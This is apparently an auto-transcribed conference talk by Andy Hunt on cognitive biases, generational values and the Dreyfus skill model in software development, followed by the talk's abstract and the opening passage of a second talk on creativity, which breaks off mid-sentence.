Count how many passes? The correct answer is 16 passes. Did you spot the gorilla? For people who haven't seen or heard about a video like this before, about half missed the gorilla. If you knew about the gorilla, you probably saw it. But did you notice the curtain changing color or the player on the black team leaving the game? Let's rewind and watch it again. Here comes the gorilla and there goes a player and the curtain is changing from red to gold. When you're looking for a gorilla, you often miss other unexpected events. And that's the monkey business illusion. Learn more about this illusion and the original gorilla experiment at theinvisiblegorilla.com. So I used to show the original version of this, just the regular gorilla experiment where you've got the kids passing the basketball and the gorilla walks in and they're like, I've got 15, I've got 17. It's like, great, did you see the gorilla? The what? 
I need to show it again. And how can you miss it? You see it the second time and it's like, how do you possibly miss this? But we do. So this has been around the interwebs, people got used to it. It's like, I know this one, I know about the gorilla. Yeah, great, did you catch the curtain changing color? Did you catch the player leaving the scene entirely? Right out the edge. But that's okay. I mean, this is a very busy video. You know, there's a lot to keep track of, a lot of motion, you're trying to keep track of the passes. So let's try something a little simpler, perhaps. I'm just going to show a couple of single still photographs. Nothing's moving, but something's changing. Raise your hand when you spot the change. How'd you do? Oh, oh dear. That whole bit of greenery went away. Okay, let's try the next one then. Now you're warmed up, now you know what to look for. Okay, a little better. Okay, you're warmed up now. Okay, only a little better. Okay, this is an easy one. You'll definitely get this. Yeah, the entire side goes away. So, it's interesting, you know, we're really just not well equipped to notice slow moving things. You know, gradual change creeps up on us and we just don't notice it. This is a real problem. If you're on a software project, what's changing? Everything. Right? The requirements are changing, the technology is changing, there's stuff changing all around us and we're not really well equipped to see that or to experience it. So that's kind of the first interesting thing. But I'd like to go on, I mean that's just sort of fun. You know, we're blind as bats. Okay, fine. But I want to talk about some actual sort of processing errors, if you will, in how our brains operate. If you look on, say, Wikipedia and you look up cognitive biases, there are some 90 common known cognitive biases. I've certainly met people who can exceed that number by a good bit, but there's 90 common ones. And I'm just going to go through some of my favorites here and just talk about them for a little bit. The first is relying on memory. Our memory is so bad. You know, we tend to think of memory as like a hard drive. You know, something happened and it gets written to disk and we've got it. Maybe we'll forget it, but at least what we remember is accurate. Right? No, it doesn't work that way. In fact, the way that memory works, every time you access a memory, you change it just a little bit. You access it enough over the course of a lifetime, it can change quite a bit, to the point where that incident that you think you remember when you were six years old probably didn't happen that way. Maybe it didn't even happen at all. It's very easy to implant false memories into people and to suggest things; we're very suggestible. And every time you access a memory, that rewriting takes place in your current context, how you currently understand the world, your current age. You know, so every time you're accessing it, it changes a little bit. This can get really difficult on a software project. You're sitting there, it's months and months into it, and it's like, why did we decide to do XYZ again? Oh, well, because, and you're going to get 15 different answers because everyone will remember it differently. This is why it used to be good practice to keep like an engineering log or something where you just scribble some notes to yourself.
You know, when we had this meeting, we decided to use this component because XYZ. That's a great thing to do because then months later you can go back and look, why did we decide to do that? Oh, yeah. We thought that at the time. Okay, makes sense. This is different now. Now we can do this, whatever and ever. But if you rely on memory alone, even communal memory in the team, it's very foggy, not reliable at all. Some other things that can throw us off the track a bit. There's this great experiment related to a phenomenon called anchoring. The way this works is our brain is always seeking patterns, trying to find stuff to compare, but it's not always so picky about what it compares, and it can get confused really easily. So for instance, if I started talking about the fact that my publishing company, our publishing company, the Pragmatic Bookshelf, that we have hundreds of books for you to peruse. We've got hundreds of authors, and I keep tossing out this word hundreds in various contexts, and then I say, here's a nice leather-bound edition of Programming Ruby for $85. Your brain somewhere says, oh, that's less. That's a bargain. It has nothing to do with it. They're completely unrelated. Doesn't matter. Your brain seizes on that. So they did an experiment with undergrads doing bids in an auction. And before the experiment, they prepped the group and said, okay, if your Social Security number, your national identification number, your driver's license number, whatever you have, take your number out and write down just the last two digits. That's all. And now we're going to go ahead and bid on this auction. And what they found was people in the audience who had relatively high last two digits tended to outbid the other students by anywhere between 60 and 120 percent. They bid twice as much on the objects. They perceived their value to be twice as much solely because the last two digits of their ID number happened to be high. We do this kind of thing, unfortunately, all the time. Marketing people know this. The politicians know this. And they use this to their advantage. You anchor on something and then you make the wrong decision. We'll talk more about that in a bit. Another interesting thing is the fundamental attribution error. And I just love the picture. The problem here is lack of context. We have an innate system. Maybe it's some kind of ego prevention. But if I've done something terrible to the team or something bad to the code or whatnot, it's because I had a bad day. I missed breakfast. I didn't get a good night's sleep, whatever. You have kind of an excuse for it. If you do something bad, it's because you were born that way. It's because you are from this part of the country or that or from this country or the other or this political party or this race or this species, whatever it is. It's because you are you that this happened. Whereas if I did it, that was just context. That was just whatever. So we have this mistake of attributing something to the fundamental behavior of a person instead of the context that a person is in. Something to bear in mind. You can see this a lot on internet troll fests when the comments start flying. It's not that your position is wrong. It's you are an idiot and your mother has had sex with farm animals or whatever. It degrades pretty rapidly. So just something to bear in mind. It's context. It's all about context. Now the next one is particularly bad for agile projects and agile adoption. And that is a built in need for closure. 
And Dilbert sums it up quite nicely. Dilbert says, I didn't have any accurate numbers so I just made this one up. Studies have shown that accurate numbers aren't any more useful than the ones you make up. How many studies showed that? 87. You laugh. The problem is, and this one is really pernicious, because every project starts off and some bean counter in accounting says, okay, there's a spot in the spreadsheet I've got to put a number in. How much is this going to cost me? And you give the agile answer, well, we don't know yet. It's exploratory. We'll find out. No, no, no, no. I need a number to put in the box. I don't have a number. Fine, 87. Good. Doesn't matter. Doesn't matter. And this is a curious thing. All parties concerned, including the requester, are well aware the number you just pulled out is rubbish. It's garbage. They know that. It's okay. It's a number. I have satisfied my need for closure. I have a number. I know it's wrong. I don't care that it's wrong. I have it. I can get my hands on it. I'm happy. This happens unfortunately all the time. You know, you say, well, you know, what technology are you going to use here in this project? Well, we haven't decided yet. I've got to fill that out. I have to know. Okay, fine. We'll use SQL Server. We're not really. But fine. You know, I write it down. Oh, yeah, we changed our mind. We're using amnesia instead. We're using MySQL or we're using, you know, what have you, Mongo. But you've got to have that need for closure. This flies in the face of agile development where we want to leave all our decisions open as long as possible, defer decisions, and make them late in the game. This is a really hard one to get past. Some folks have an easier time with this than others. A lot of folks, this is really hard. They have to have closure even knowing that the number is wrong. Confirmation bias, another popular one. You see this a lot on the TV news cycle. Any facts or events that don't fit your worldview, you just throw out. So you just amplify the stuff that you agree with. And of course, the whole world thinks this way because look, everybody agrees with it, and you throw out the rest of it. Entire books. You know, every author who writes a book with any opinion in it, you could argue that's just a big example of confirmation bias, because they're going to throw out the other stuff that disagrees with them. That's just how we work. The exposure effect. This is a great one. The more often you see something, the more acceptable it becomes to you. The more familiar it is. Politicians know this very, very well. And that's why they will do everything to get their face out there. They will play sax in the bar. They'll get their picture on the poster. They make sure you know their name. Even if they're a scumbag, you know the name. So when the time comes, you're like, okay, here's a name I know versus some name I've never heard of, you're going to go with the familiar. It's the way it works. You see something over and over and over again, even if it's horrific, even if it's horrible, even if it is the intellectual equivalent of broken glass on a toilet seat, it's familiar. And you will stick with it to your detriment. Even if the plane is crashing, you will stick with it. Familiar is not good, but we conflate the two. Just like in that anchoring experiment, we just get kind of muddled with it and we confuse them. If something is damaging your project, if it's not good, dump it. Get rid of it. It doesn't matter how familiar it might be.
There's the Hawthorne effect. This is a lovely one. This is the deal where consultants come in. They're studying your team, studying your organization, and suddenly everything's working great. They've got some new gizmo they're trying to sell, some new process, some new tool. Everyone's using it. Productivity's up. Numbers are great. Everyone's happy. What happens when they leave and stop watching? Everything goes right back to the way it was before. We work differently if we know somebody's watching, at least for a little while. Relativity. So, what company was it that made the first bread maker? I've lost track. And the font's too small. Williams-Sonoma. They made the first automatic bread maker. This thing was a marvel. You open up this little R2-D2-like box, stick some flour and water in, hit the timer, and some hours later, a baked loaf of fresh bread comes popping out of it. This was a marvel in what, the early 90s, I suppose it was? An absolute marvel. The problem is, they were the first to market with it. So how do you price the thing? Oh gosh, I don't know. So they picked a price, set it, put it out there, you know. They heralded this technology. This was incredible. Fresh baked bread and all you do is hit the button. Nobody bought them. Sales were modest at best. And they're scratching their head. They didn't know why. So they fished around, talked to some psychologist types and said, okay, I know what we're going to do. We're going to keep this at about the same price it was, $250. Doesn't matter what units. Pick a unit that's comfortable to you. But we're going to come out with the luxury model, the high-end model that does many more things and price it at twice the amount and put those two out there. Suddenly, no one ever bought the big one. But now they bought the middling one because it was perceived to be a bargain. Because you start off with the question, well, okay, is this a good value? Well, I don't know. What does a bread maker cost? I have no idea. They just invented the thing. But now, what does a bread maker cost? Oh, well, it either costs $500 or $250. Oh, look, this $250 one is a bargain. It's half the price. Okay, right? I mean, they made these numbers up completely. These aren't even the real ones. But you make it up completely because now you've got this false relativity to contend with. It's like, oh, this is less. I will go for it. We fall for it every time. We fall for free. Free is not the same as cheap, however. Free is immensely valuable. Free is awesome. Free is better than one cent or one franc or one krone or what have you. In fact, when Amazon.com first rolled out their Amazon Prime option, you could pay a flat rate and then shipping was free. Right? And they're like, this is going to be dynamite. They rolled it out in the US, sales took off. They rolled it out in other countries, Asia-Pacific, Europe. Sales took off. Worked great everywhere except France. They rolled the offer out in France. Nothing happened. What was up with that? So they looked into it a bit and they discovered for whatever reason the French division, when they did this, the free shipping wasn't actually free. It was cheap. It was like one franc or euro, whatever they had at the time. It wasn't free. It was very cheap. Didn't count. People did not fall for it. They changed it to free. Their sales then matched everyone else. Popped right back up again. Why do we do that? Well, that's a good question. We're cheap. We like free. We have a very strong sense of loss aversion.
We don't want to lose anything that we already have, which is kind of funny. There's an example. I'm not sure if it's in this talk or not, so I'll just give it now anyway. Have you ever heard of the South Indian monkey trap? Wonderful thing. Apparently, there's a lot of monkeys running around Southern India and you need to trap them. Okay? So what you do is you dig a hole in the ground with sort of a narrow entry and then a hollowed out part and you put bananas or bait, whatever down in it. Monkey comes along, sticks his hands in, grabs the bananas, can't get back out again. The entrance is too narrow. Simple thing to do, right? Just let go of the bananas and you'd be free of the trap. What does the monkey do? Right? You sit in there, chattering away, stuck because they will not let go of the bait. They are so loss averse, they will not let go of the bait and they get trapped. Happens to us in a similar manner. Sometimes you just got to let go of it. Reasons we fall into some of these traps. I want to talk about symbolic reduction. So what happens here is we tend to focus even on the wrong questions a lot of the time. I had to move houses recently and as part of that I had to clean up the back of my office. So this was a very terrifying prospect. I'm sitting there going through this mountain of cables, right? And in the middle of this bundle of cables I found an old 19.2 modem. Wasn't hooked up to anything, just this ancient modem in this ball of cables. It's like, wow, that was, it's like archaeology, right in the office. It was awesome. But I also found a bunch of old magazines from sort of mid 1990s kind of time period. Objects something or other, Java something or other. I, you know, a bunch of these kind of popular magazines at the time. And the headlines were the same on all these magazines. The huge questions of the day. Who will win the desktop wars? Will it be motif or open look? Wrong question entirely. Missed the whole web thing entirely. And right after that big debate and this went on like a year, two years, these were the headlines. Another set of headlines. Who will win the middleware wars? What will be the triumphant technology? Will it be Corba or RMI? Neither, right? Dead, missed the web, missed it completely, you know, missed the dominance of the PC. Totally the wrong question even to ask. And all of these, you know, you can go through other periods of history and find the same thing. Who's going to win A or B? And the answer is almost always E, none of the above. It's none of the contenders you think it is. So we make predictions. This is kind of part and parcel as how our brain works is to go in and try to, you know, see something and predict what's going to happen on a daily basis. Even just reaching out, grabbing a thing of water, walking. We're constantly making predictions. But to predict anything longer range than, you know, say even a couple of minutes, we're really bad at it. Largely because some unexpected event changes the game. You know, in that case the introduction of the IBM PC, changing the face of the desktop, later the Mac, advent of the web, all these kinds of things. These were more or less unforeseen events. So there's a great book out there whose name just went out of my head. Talib wrote it. Black Swan's in the title somewhere. Google will find it for you. But the idea of a black swan is that some very high impact, hard to predict event, will change the shape of what you're trying to predict. 
And in Taleb's book, he's like, okay, anything significant in history, this is what happens. It's always the big unexpected change that comes in. The title of the book comes from the idea that, you know, for many years scientists thought there was no such thing as a black swan. There were only white ones because they'd never seen one. And one comes trotting by and they're like, oh, would you look at that? Whoops. I've got to change that a bit. So why does this happen to us? Well, one of the ways the brain works is to reduce much of your input to a kind of symbolic representation. So this is coincidentally why none of us probably can draw very well. Right? So you're all programmers, tech people, right? Raise your hand if you're a great artist. Yeah, don't be shy. Go ahead. Come on. Yeah, right. No, it's not happening. Because we're so very good at manipulating and dealing with symbols. What happens is we're very good at symbolic reduction. So when you say, you know, draw a hand or even mention a hand, somewhere in your brain it's like, oh, hand, I know that. It's a stick with five lines. And you go to try to draw it and some part of your brain is shouting, what do you do with all these curves and shades and shadows? It's a stick with five lines. And there you go. So of course what happens is in this reduced state in our brain, you lose all the detail. You lose all the nuances, all the context. And that's part of why we fail to see some of these big changes coming on the horizon. We just shrink the details up and then we don't have them to access. So, okay, that's all kind of bad. But these are structural things. These are processing things. There's not much you can do about it except kind of be aware of it. But there's worse things, I think, perhaps. There's things that affect the very core of our judgment and decision making. And this is largely because we still cling to this idea that this is the representation of human decision making, that we're logical, we're rational, we're thoughtful, we think things through, we make checklists. Unfortunately, that's really not a good model of human decision making. This is a lot closer to what's really going on. You've got the gibbering monkey brain inside of you going, wow, squirrel! And, you know, if you really want to, go read the book Predictably Irrational, which goes through and catalogs an absurd number of ways that we just think the wrong thing, totally, all the time. But I want to talk here about something that's maybe less touched upon: things that influence our decision making. First one's kind of easy. You know, what's your basic personality? Are you the kind that values realism and common sense, probably? Or the kind that values imagination and innovation? They're different. Folks can come down on either end of that spectrum. Some folks will insist on fairness at all costs, even if it hurts them personally. Others are more into empathy and harmony. Some folks have to be quiet when they're thinking about it. They think about it in their head until the thought is fully formed, then it comes out at the meeting. Some folks like us, the jaw just flaps. It just comes out while I'm trying to form the thought. I sound like a gibbering moron in a meeting. Because it's well, you know, all this stuff's coming out. And the person sitting at the end just waiting, they won't say anything for an hour, then come out with some fully fledged thought that's like, well, that's really bright. 
Of course, they haven't said a bloody word for an hour, so it took some time to cook. Some folks genuinely just want to be told what to do. Just give me the step by step, I'll go through it, I'll go home, play World of Warcraft, life is good. Some of us think that's horrid. I don't want to follow a bloody list of steps. I want to figure it out for myself. All fine, all valid. It's baked in differently for each person. This is going to affect how you approach decision making. So along this line, you've got the Myers-Briggs personality types. And this is kind of an interesting look. You can be one of these four values. I'm not going to go through them in any detail, for reasons I'll explain in just a second. But if you look at the combination of values, you see some things that they put in these sort of classifications. You're a planner, you're a developer, you're an analyzer, a composer, you may be your promoter, motivator, explorer, strategist, this sort of stuff. Really kind of interesting different angles on how you might approach life and what your baked in philosophy is. There's only one problem with this. It's a bit like a horoscope in that you really can't fit human behavior into four bits. It's just kind of a difficult proposition. There is some value to it. And it's worth it. If you haven't taken one of those Myers-Briggs tests, it's always kind of interesting, but you have to realize this is a self-assessment. It's going to depend on your mood that day. Depends whether you answer with your work persona or your home persona. Maybe they're the same for you, maybe they're different. So it's a little bit fudgy, but it's kind of interesting to look at to see where your preferences may lie. But deeper than that comes with sort of what you value. Do you characterize yourself as a liberal, a conservative, an anarchist? Do you know how hard it was to find an anarchist logo? Just saying. That was less obvious than I thought it would be. But the problem is, okay, so you identify yourself one of these ways, right, conservative, liberal, what have you. But why? Were those your parents' values? Was that directly opposed to your parents' values? Were you just born that way? Yes. All the above. This can all happen. But what's interesting is, do you know what makes the biggest difference as to what kind of values you hold and how this works? It depends on who else was born the same time as you. Your cohort, your peers, your birthmates. The researchers who look into this kind of stuff say that you have more in common with somebody born at the same time who lives in Mexico City or Tokyo than you do with somebody right next door who is 10, 20 years older or younger. So the power of the cohort is really quite strong because of the sort of shared memories, habits, styles, significant events that happen. Depending on your age, you might remember where you were when the Vietnam War ended. I remember that. When Elvis died, when Reagan was shot, 9-11, all these sorts of major events that happen that your cohort will remember the same way. Because what happens is, if you're 20 and one of these events happens, you'll have one outlook on it. If you're 40 or 60, you're going to perceive that same event quite differently just because you had a different point in your life. So you and your cohort tend to view events in a very similar way. And that sort of drives us a bit. I love this poster here because this is the one where the young ones are like, wait, which Star Wars was that? There's no number. 
So what kind of differences can this bring about? Well, different generational groups, some are going to be much more prone to taking risks. Some will be very risk averse and not want to hear about it. Some will really value individualism. Others not so much. They favor more of a teamwork approach. Some value stability. Others put their faith in freedom and will accept a little chaos for that. Some focus on family. Other generations more on nose to the grindstone work. So what's interesting is, according to such researchers, there's actually only four different kinds of generations and they repeat. So they did their research starting in Europe around the Renaissance and followed it over to the Americas. And in 20 generations of their study, there was only one gap in the pattern and that was in the American Civil War in the 1800s because we killed everybody. So there wasn't anyone there to kind of take their place in society as they would have normally. Other than that gap, they found this very regular repeating pattern of four archetypes. You have a prophet generation, a nomad, a hero, and an artist. And in general, I'll give the caveat on generalities in just a second, the prophet generation values values and vision. The nomad, not so much into that, they value their liberty, their survival, their honor. Or if you would, in Klingon, their honor. The hero generation, much more into community, into affluence. Let's share all this together. The artist, pluralism, expertise, due process, do it by the numbers. So they mapped this out onto the last couple generations and tacked cute little names on them because that makes for good press. So you have the GI generation, which was a hero generation, people born back around the turn of the previous century. The silent generation after that, an artist generation. The baby boomers, the boom generation, a prophet. Generation X, the nomads, millennials, back to hero again, and then the newest homeland generation back to the artist. So a couple things here. First of all, a caveat. When you talk about a generation of people having this particular characteristic, it does not mean that everyone born at this time thinks this way. What it means is that if you take on the aggregate a whole bunch of people, the folks born in this bucket will tend to share these values and these outlooks, more than people in any other adjacent one. The dates are not firm. They're kind of, yeah, about then. So you can be born on a cusp year and you might feel partly this way, partly that way. These things happen. That's okay. But here's a question. Why does the cycle only go for four generations? Why does it then repeat? Well, that's kind of an interesting thing to ponder about. You probably knew your parents pretty well in most cases. You probably knew your grandparents, at least to some degree. What do you know about your great-grandparents? The names, where they lived? What about their parents? Anything? Anything? If you're lucky, maybe you've got a family tree, you can pluck some names out, but you really have no experience of what their lives were like. So what happens after four generations? It kind of passes out of memory. Now, it'll be interesting to see if this changes. Now that you've got Facebook recording everything and the NSA making a backup copy. Great. For archival, it's wonderful. Really, we've got archival copies of everything. I don't have to worry now. But this kind of thing kind of falls out of human memory. 
Once we start keeping all that and you can go back and look at great grandma's Facebook posts, is that going to change the cycle any? I don't know. It'll be interesting to see. So given the last couple generations that have happened here, you start off, you've got the GI and silent generations very hip on a very military metaphor. Business and the military were conducted on command and control. The focus was more on process rather than necessarily on action. The idea is that, oh, you just have, you know, as long as you've got a good process, as long as you follow it, it'll just turn out okay. Because the faith is in the process, not necessarily the outcomes. These folks are now in what, their 60s, their 80s. These would be the elder statesmen of any industry, any generation. And this is where they're coming from. Next, you've got the baby boomers. This was a prophet generation. They wanted to save the world, collect the whole set. Again, less interested in outcome than approach, with a tendency to what some other generations might call moralizing or being preachy. Because they're all about their values and do this and do that. It's like, well, yeah, okay. But then you get Generation X. What some say was raised by wolves. This was the greatest entrepreneurial generation in history. But rejects labeling. They have no logo. I want no stinkin' logo. When interviewed in these kinds of studies, they don't identify themselves as Gen X. They identify themselves as not a boomer and not a millennial. Which is kind of interesting. If there's a problem, they'll quit and move on. I ain't fooling with this. Folks from other generations will take different views of it. Well, someone should fix this. Well, I ought to fix this. Whatever. There's different viewpoints. This group will be like, saw it. Move on. Next. Fiercely. Fiercely individualistic. Then you get down to those kids today, get off my lawn. The millennials. They plan ahead, bless their little hearts. Much more upbeat, much more team and community oriented. They're not going to save the world so much. They've got this more of an attitude of, well, somebody in charge should fix this. Kids, I got news for you. You'll find out. So these things kind of go through and cycle and repeat. Now, what I find interesting just from a software development point of view is if you look at the older generations, you see a much greater emphasis on rigid hierarchies and a just hell bent for leather focus on process. You've got to do these steps in this order. Then that moves on to the more Gen X-ish, oh, just do it. Individualism. I'm okay. Bad luck to you, but just do it. Then a move into the more recent generations. Well, let's get everybody involved. Let's get the team involved. This is more of a community thing. Could it be that one of the reasons that open source is exploding so much is because a different generation is coming up to do it, where they treasure that kind of interaction more than us old fogies? Perhaps. Interesting to think about. But there's a definite parallel here to methodologies as they come down and how we develop software as reflecting the values of whatever generation is kind of moving through. Now, this makes it particularly interesting because at the moment, we've got more generations in play in the workforce than ever before. You've got everybody, everybody's got their hand in it. The poor old folks can't retire because there's not enough money and the young folks are desperately trying to get money for college. 
You got everybody in the mix, which makes it really quite interesting. So these are things that can subtly affect your approach and your decision making that you're probably not consciously aware of. One more topic I want to go into. That's about skills themselves. Back in the 80s, the brothers Dreyfus, Stuart and Hubert, wanted to research artificial intelligence because they wanted to build an artificial intelligence that would learn skills the same way that humans did. I thought this would be a dynamite idea. Only one problem. They had no idea how humans learned skills. So they had to research that first. They never got around to the AI part particularly. But they did come up with this idea of the Dreyfus model of skill acquisition. What happens is you start off anything as a novice with no experience and work your way up toward expert. And along the way, a lot of things change. The biggest thing they discovered was that as an expert, you're not just a really smart beginner. You fundamentally perceive the world differently. You approach problem solving differently. You value different things. Your decision making process is different. The whole thing is different and gets that way as you climb up the ladder. Let's take a quick look at the stages in the Dreyfus model. Stage one, predictable. You have no experience. You don't really want to learn. You just want to get it done. You don't know how to respond to mistakes and so are vulnerable to confusion. If I'm learning a new programming language, I'm there. This is it. I just want to get this done. What do you mean there's no loops in this language? You have to use recursion. Fine. Okay. Then the compiler spits out, blah, blah, blah. I have no idea what that means. It could mean a permission problem on my installation. It could mean I left off a bloody semicolon. No idea. I'm at a novice level at this particular skill. The only way you can succeed as a novice is if you're given context free rules. When this happens, do that. This is how call centers are able to operate with people answering the phones who really have no domain knowledge. They're novices in the field, but there's a decision tree. My computer doesn't work. Is it plugged in? Yes, no. They go down the tree. You've got rules. Note on the word experience here. Experience in this context means I've done something and I've learned from it. So by that definition, I've filed my taxes for 30 years now. I have no practical experience at it. I'm still a novice. I still don't care. I just want to accomplish a goal. I don't know how to respond to mistakes. The tax service sends me this big yellow letter yelling at me and I have no idea what they're on about. I send it to the accountant. You have to give me context free rules like take all your money, send it in. Okay. That seems about right. So novices need recipes. They need to know, okay, I do this, then I do that. And then you can go on from there. Stage two, you grow up a little bit. You can start trying things on your own that are off the recipe card. There's still difficulty troubleshooting because you've got no sense of the big picture yet, no mental models to work with. You want information faster now. So you're learning a new language. It's like, oh, okay, I want this thing out of their standard library. Where is it? Where is it? That one. Yeah, okay. Wrong one. Okay. It's frustrating because you kind of want to suck the information in very fast. You can begin to follow someone else's advice a little bit but not great yet. 
Again, you don't have that overall understanding. And worse than that, you don't want the big picture. The big picture at this point in time would just be confusing to you. And you see this problem sometimes in like large corporate meetings where they have an all hands meeting and the sales guy gets up and he's talking about sales things and you're like, oh, just gnaw my leg off and get me out of here. I don't care about this because you are a novice or advanced beginner at that particular topic. So it really doesn't make sense to you. It's just frustrating and annoying. Then we get up to competent. All right, now we're starting to get some traction. At this level, and now for the first time, you begin to develop conceptual models of the topic area. You begin to understand that programming language. When a syntax error comes up, it's like, oh, that's because it's parsing the line like this and it didn't see my comma, semicolon, whatever it was. You can start to troubleshoot problems now that you've got a bit of a model. So the big leap when you get to step three is that you can start to troubleshoot. And that's important. Now we start getting into the real fun. You get up to proficiency. Now you really have to understand the big model. You want to understand the larger framework. You get very frustrated with oversimplified information. You call up that helpline and say, I'm getting a blue screen of death because of this new device driver I just compiled and they say, is it plugged in, sir? Punch him right through the phone. You can self-correct previous poor task performance. Now this is important. This is only at level four. And one of the things that an agile process says is you should learn from your mistakes and correct them. That's dynamite if you're a level four practitioner. Less than that, you need help. You need a coach. You need a mentor. You need somebody who knows what they're doing because you don't have the skill to do it yet. Level four, you do. You can learn from the experience of others. You can understand and apply maxims, proverbs, fundamental pithy sayings that make sense to you in this context. For instance, XP says test everything that could possibly break. Dynamite, great advice if you know what it means. If you're a beginner, what can break? Hell, everything. Getters and setters could break. Log statements could break. I wrote it. Everything could possibly break. Up the chain a bit, it's like, okay, you're not going to bother with the stupid stuff, but this big hairy calculation where there's an even/odd and a divide, I know I'm not going to get that right. Okay. I know my strengths and weaknesses. I know what's likely to break and what's not from my experience. If you're less experienced, you just don't know. And this is where you get into trouble with things like design patterns. For example, the Gang of Four book comes out and documents the, what was it, 24, 27, 23 design patterns. And experienced people are like, okay, I recognize this is kind of cool. These are patterns that make up for deficiencies in the C++ language that was popular at the time. If you had a real language, you don't need half of these. But that's fine. And everyone else is like, wow, recipes. So true story, I knew this guy on a project, he was writing this little bit of report writer code. He just read the design patterns book. And in this hapless little piece of code, he wedged in something like 19 out of the 23 design patterns because he could. 
This also, by the way, is why you really want to do code reviews or pair programming. So proficient practitioners can self-correct. That's important. Now we get to the end of the line, we get to the expert. These become the primary sources of knowledge and information, always looking for new and better methods. Interestingly, experts work from intuition far more than reason. You know, you look at this design, is my design good? No, it sucks. Why? It just does. They know it. They're correct. But they're often very inarticulate about how they arrived at decisions. The doctor looks at you and is like, oh, you've got such and such syndrome. And they'll run the tests and they're right. How did you know? I don't know. He looked wrong. It's just, it's so ingrained. It's so baked in, I can't really articulate it. Also, if you force the expert to follow the rules that you set down for the novices, you drag their performance down to the novice. And they actually did this experiment with airline pilots and showed very conclusively that you wreck expertise by making it follow the rules because experts need to rely on their intuition. So you've got this overall movement from rules to intuition, from considering everything to being able to narrow down to relevant focus, and even such things as a novice will consider themselves over here and the project over there. It's sort of detached from it. The expert understands systems thinking and systems and realizes that they are a part of the system. Everyone on the team is a part of the system. That's a part of the company. It's all interrelated and interacting. So they're much more aware of that kind of viewpoint. Whereas the beginner, not so much. So how you approach problem solving, how you view these things, the decisions you make here, changes depending on your skill level. So even if you've figured out, okay, I'm a left leaning liberal who likes dogs and cats and whatever else from all that other stuff and my personality wants me to do this and whatnot, that's dynamite. That's all going to change. It changes as you gain skill, changes as you get older. So I leave you in a bit of a quandary then. Your brain's really messed up. What are you going to do about it? Oh, my, look at the time. Okay. Well, so we'll just go now. You want to, where possible, and as you get up the expertise ladder in some particular skill, you want to be able to start off with intuition. Once you have enough skill where you can rely on that, you want to start with that, but you can't stop there. You have to verify it. And this is where some experts get into trouble. They get so used to relying on their intuition, facts change. Things change underneath them. You experience that change blindness that we saw with the gradual change studies and the gorilla and the curtain and all of that. And so they begin to rely on their intuition and forget to actually verify it and run into trouble. So we want to actually, where we can, place our trust in actual outcomes. Did the project succeed? Did the code work? Are we actually doing the right thing? And not trust to process alone or metrics or wishful thinking, which is our most popular way. We get the wonderful Far Side cartoon where they realize, it's time we face reality, my friends, we're not exactly rocket scientists. They look at, they've got the lab coats, they got the little clipboards, but look at the outcome. The outcome didn't make it. It is, he says with a pun, critically important to apply critical thinking. 
And I think in general, we're lazy and we just don't do this enough. We jump to conclusions, we make assumptions and we tend to ignore actual facts. You know, actual facts become, well, I read it on the internet, you know, it was on Reddit, it must be true. And this is a problem. We need to be better at observing something without bias, actually research statements. You know, I wish, I honestly wish that every time somebody hit the post button on Facebook, it would automatically like search through snopes.com and if there's a match, say, no, you just can't post that. It's stupid, it's a rumor, it's not real, stop posting it. You know, this kind of thing. Look for credible sources if they be any of these days and ask why. This is the favorite consultants trick, right? You get into a situation and it's like, you know, there's oil on the floor in the factory. Why? Well, something must be leaking. Okay, why? Now they're stumped. They go back, you get to five whys later. Well, purchasing had to buy this kind of seal because of this corporate directive and because of that and this and this, you go back and you find out the entire factory's got the wrong size seals in the ductwork because of some stupid PO memo that went through two years ago. Alright? Never stop at one why. Keep going and going and going like a frustrated three-year-old, but why, daddy, until you get to the end and actually get to the root of the problem? And ask yourself when you find yourself pontificating that, you know, Java is dead or Oracle is dead or everybody's programming in Ruby or nobody's programming in Ruby or Elixir is the next hot thing or it's not, whatever your position, first ask yourself, okay, great. How do you know? You know, says who? Are they credible? What are they basing it on? How specifically? What is dead dead? No adoption, less adoption? Kick to the rubbish bin of history? How specifically? So on and so on. And there's some really interesting penetrating questions you can ask yourself. Like what would happen if you did do something you didn't think you should do? What would happen if you didn't do something you thought you were supposed to do? Well, my personal favorite, what stops you from? And this was an actual exchange I had with someone a number of years ago. Said, ask that question. What's stopping you? Nothing, I answered. That gets in my way a lot too. With that in a few minutes for questions, I want to thank you all for coming. My email address, my Twitter handle, link to my book, Pragmatic Thinking and Learning that covers a lot of this kind of material. Thank you all very much. And before I let you go or entertain any questions, I am bade to remind you to put your little cards in. This is a yellow card. It's a bad example. Green cards. You want to put the green cards in the bucket outside to evaluate the talk. Feedback or comments may be written on the cards if you've got really tiny handwriting. So please do that for our good hosts. And are there any questions? Good. All right. Go get cookies and coffee. Thanks again.
|
We make important decisions and try to solve critical problems every day. But our decisions and problem solving are based on faulty memory and our emotional state at the time. Join Andy Hunt and explore common cognitive biases which can dramatically affect your decision making and problem solving skills. You'll learn why most predictions are wrong from the start. Together we'll look at aspects of context which can subtly affect you, including your own brain's legacy hardware, and how to recognize and stop that when it happens.
|
10.5446/51540 (DOI)
|
Can you hear me in the front? Can you hear me over the babble down there? Okay, so I can babble up here. That's good. All right. How are y'all doing this morning? Waiting for that coffee to kick in. You all got your coffee? You good? You good? You ready to go? You're not going to nod off on me first thing? Okay. I still have jet lag, so I might nod off, but that's okay. Well, it's a pleasure to be here today. It's really exciting to be up here talking to you on this little tiny platform wiggling by four tiny wires. Great start to the day. Just a warning in the front row, if this starts to go, I am headed your way. Other than that, we should be fine. So today, I'm going to talk about, I got three talks today. This first one is on mining your creativity or mining your creative mind. And that's mostly what I'm going to talk about, but I've got a couple other things I have to talk about sort of first and after around that. A lot of these ideas came from a book I wrote a couple years ago, Pragmatic Thinking and Learning, my seventh as it turned out. But these are the topics that I covered in the book. Unfortunately, I don't have time to go over all of these today. And if you'd like a copy of this mind map of what's in the book, you can download that from that URL. And that just gives kind of an overview of the sort of topics that are interesting to me at least in this kind of area. So first off, I want to talk about a few bits of kind of background information. Three things in particular. I want to talk about context, patterns, and neuroplasticity. One of my favorite words. I'll start off with context. If I asked you to draw a tree or think of a tree, what's the Norwegian word for tree? Okay. If I asked you to think of one of those, odds are you or ask you to draw it, you would think or draw of something sort of like this. This represents the absolute pinnacle of my artistic talent. That's as good as it gets as far as it goes. And this is how we tend to think of things. This is how our brain tends to organize things. You say tree, we think of this sort of very limited, very symbolic representation of it. The danger is that that does not in any way represent what's interesting about a tree. A tree in fact isn't an object. It's not even a system. It's a set of interreacting systems that all meet in this thing that we call a tree. You've got the whole respiration cycle with the leaves and the air and the carbon dioxide. You've got the Krebs cycle, the nitrogen cycle in the 